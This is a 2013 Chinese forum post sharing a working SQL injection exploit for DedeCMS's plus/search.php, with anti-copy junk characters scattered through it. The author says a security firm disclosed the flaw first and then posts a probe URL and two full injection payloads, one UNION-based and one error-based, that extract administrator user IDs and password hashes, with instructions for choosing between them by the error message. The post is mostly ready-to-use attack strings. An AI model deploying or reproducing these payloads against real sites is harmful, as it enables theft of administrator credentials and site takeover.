转载不加作者名的没JJ P: Y6 p. F, {5 @' I( n8 |
5 H/ \$ b1 `" D8 t8 ~3 @% a哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。+ N( x# o8 d- a; f" ]7 }
, U& G# T. Z0 ~/ z; q
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
1 F7 r, Q" r! O; T/ J9 O$ ?) ~" p/ `* T
我一般是这样测试的:9 g; B4 {$ B% T: p& E4 y! X& |0 P$ J# _
) @. R# m% G7 q( Z$ Q6 u0 T
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a* ?% F a/ v8 u- b& s
4 V$ e/ r- `) J* O) w* G* z转载不加作者名的没JJ
( Y: d& S9 B# Q; h
! p6 N5 W1 G! ~' h/ T* Y, \+ ^作者:鬼哥: u. e% S# Q2 k3 ? k
8 r( o1 L/ E& e1 Y1 x: I
& P3 n/ ` v5 n0 x$ Q+ Q! G* K
2 j5 }$ X7 F z. T1 x看结果如果提示. M& a: w/ Q0 n- _% x
8 U; }4 z, g$ o) [+ f* V6 x `Safe Alert: Request Error step 2 !
9 Z7 E( m9 @, i# S }
7 L" R1 e! Y# a2 {# ~) F! E那么直接用下面的exp1 z" b. N3 J4 Z r
: s3 m% w9 ^, e$ X5 Zxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
G# P% j4 @- P/ Z2 d5 J
9 S4 x; R7 d- q
/ a4 [# a8 v# i* ]看结果如果提示
9 t4 t6 G9 P7 i; ^
. W' H+ p2 @4 g, Z( v; f0 x$ K2 eSafe Alert: Request Error step 1 !
" ~( x: X, Q! E% D5 s3 l# o& `9 Y
+ z! u% d' z) r2 ~5 R那么直接用下面的exp
5 u; [! s* a d( B8 ]# K- R0 V7 ^4 C2 ]: i- S
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
' X/ ]5 K% A1 f( d8 |* p$ K; N! C/ P
. D9 @( B+ M" p- @& l
如果正常显示证明漏洞不存在了。* E0 s# R7 e5 g# Y
! v/ G! r( I4 d7 {+ k9 \( D P
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对